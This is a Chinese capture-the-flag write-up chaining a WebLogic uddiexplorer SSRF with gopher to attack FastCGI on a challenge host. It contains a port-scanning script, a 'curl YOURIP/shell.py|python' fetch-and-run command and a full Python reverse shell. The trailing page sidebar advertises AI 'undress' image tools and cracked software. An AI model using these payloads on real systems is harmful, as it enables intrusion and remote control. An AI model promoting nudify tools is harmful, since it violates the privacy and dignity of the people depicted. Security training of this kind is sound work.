三個白帽-寻找来自星星的你 - 第一期
挑战介绍
来自星星的你被我给丢了,我可能需要用我所有的一切才能把你找回,编了两句就编不下去了,好吧,我承认这是一期渗透题,就是这么直接。
挑战目标
http://0761e975dda0c67cb.jie.sangebaimao.com/
0x01 信息收集
打開地址,是一個dz論壇。似乎不怎麼好玩啊,還是最新版本的。
既然是滲透了,感覺祭出大殺器“掃描目錄”! (字典才是關鍵)
很快就get到關鍵信息了(排除dz原有的目錄及頁面)
/info.php/uddiexplorer/
一個是phpinfo()信息,很有用處的。
/opt/discuz/info.php
另一個是weblogic的東西。
果斷百度 "uddiexplorer 漏洞",馬上可以知道 weblogic uddiexplorer存在 SSRF漏洞。
這次滲透的關鍵就在於 SSRF!!!
利用漏洞
SSRF並不只是搞內網,結合三個白帽的結界docker,搞127.0.0.1才是王道!
萬能的百度啊,搜索關鍵字 "SearchPublicRegistries ssrf 漏洞 exp"
得到http://www.tuicool.com/articles/UjaqIbz
得到一個腳本,自己修改一下拿來用!!!
端口掃描.py
#!/usr/bin/env python # -*- coding: utf-8 -*- import reimport requestsdef scan(ip_str): url = 'http://0761e975dda0c67cb.jie.sangebaimao.com' ports = ('21','22','23','53','80','1080','1433','1521','3306','3389','4899','8080','7001','8000','9000','9001',) for port in ports: exp_url = url+"/uddiexplorer/SearchPublicRegistries.jsp?operator=http://%s:%s&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search"%(ip_str, port) try: response = requests.get(exp_url, timeout=15, verify=False) re_sult1 = re.findall('weblogic.uddi.client.structures.exception.XML_SoapException',response.content) re_sult2 = re.findall('but could not connect',response.content) if len(re_sult1)!=0 and len(re_sult2)==0: print ip_str+':'+port except Exception, e: passif __name__ == "__main__": scan('127.0.0.1') 成功破出22,80,3306,7001,9000等端口。
SSRF+GOPHER一直都很牛逼,最近更是火熱。
還是百度~~
rr菊苣最新文章 《Do Evil Things with gopher://》
0x03 攻击 FastCGI
一般来说 FastCGI 都是绑定在 127.0.0.1 端口上的,但是利用 Gopher+SSRF 可以完美攻击 FastCGI 执行任意命令。
0x06 参考
PHP FastCGI 的远程利用命令執行
下載fcgi_exp
運行
nc -l -p 9000 >x.txt & go run fcgi_exp.go system 127.0.0.1 9000 /opt/discuz/info.php "curl YOURIP/shell.py|python"php -f gopher.php
把payload保存到x.txt
反彈shell的黑科技,bash反彈無效~~
然後urlencode編碼payload生成ssrf.php
shell.py
import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("yourip",9999)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call(["/bin/bash","-i"]); gopher.php
<?php$p = str_replace("+", "%20", urlencode(file_get_contents("x.txt")));file_put_contents("ssrf.php", "<?php header('Location: gopher://127.0.0.1:9000/_".$p."');?>");?> 成功生成了利用文件ssrf.php
反彈shell
VPS運行
nc -lvv 9999
利用SSRF
http://0761e975dda0c67cb.jie.sangebaimao.com/uddiexplorer/SearchPublicRegistries.jsp?&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business%20location&btnSubmit=Search&operator=YOURIP/ssrf.php
成功反彈~~~
GETFLAG
自己找吧
crypt()和password_hash()有什麼區別?Apr 30, 2025 pm 03:39 PM本文討論了PHP中的crypt()和password_hash()的差異,以進行密碼哈希,重點介紹其實施,安全性和對現代Web應用程序的適用性。
如何防止PHP中的跨站點腳本(XSS)?Apr 30, 2025 pm 03:38 PM文章討論了通過輸入驗證,輸出編碼以及使用OWASP ESAPI和HTML淨化器之類的工具來防止PHP中的跨站點腳本(XSS)。
PHP中的自動加載是什麼?Apr 30, 2025 pm 03:37 PM自動加載PHP會在需要時自動加載類文件,從而通過減少內存使用和增強代碼組織來提高性能。最佳實踐包括使用PSR-4和有效組織代碼。
可以使用PHP上傳的文件的最大大小是多少?Apr 30, 2025 pm 03:35 PM本文討論了在PHP中管理文件上傳大小的管理,重點是2MB的默認限制以及如何通過修改PHP.INI設置來增加它。
PHP中的無效類型是什麼?Apr 30, 2025 pm 03:34 PM本文討論了PHP 7.1中引入的PHP中的無效類型,允許變量或參數為指定類型或NULL。它突出顯示了諸如提高可讀性,類型安全性和明確意圖的好處,並解釋瞭如何聲明
unset()和unlink()函數之間有什麼區別?Apr 30, 2025 pm 03:33 PM本文討論了unset()和unlink()功能在編程中的差異,重點關注其目的和用例。 unset()從內存中刪除變量,而unlink()從文件系統中刪除文件。兩者都對效率至關重要
熱AI工具
Undresser.AI Undress
人工智慧驅動的應用程序,用於創建逼真的裸體照片
AI Clothes Remover
用於從照片中去除衣服的線上人工智慧工具。
Undress AI Tool
免費脫衣圖片
Clothoff.io
AI脫衣器
Video Face Swap
使用我們完全免費的人工智慧換臉工具,輕鬆在任何影片中換臉!
熱門文章
熱工具
SublimeText3漢化版
中文版,非常好用
PhpStorm Mac 版本
最新(2018.2.1 )專業的PHP整合開發工具
ZendStudio 13.5.1 Mac
強大的PHP整合開發環境
mPDF
mPDF是一個PHP庫,可以從UTF-8編碼的HTML產生PDF檔案。原作者Ian Back編寫mPDF以從他的網站上「即時」輸出PDF文件,並處理不同的語言。與原始腳本如HTML2FPDF相比,它的速度較慢,並且在使用Unicode字體時產生的檔案較大,但支援CSS樣式等,並進行了大量增強。支援幾乎所有語言,包括RTL(阿拉伯語和希伯來語)和CJK(中日韓)。支援嵌套的區塊級元素(如P、DIV),
EditPlus 中文破解版
體積小,語法高亮,不支援程式碼提示功能
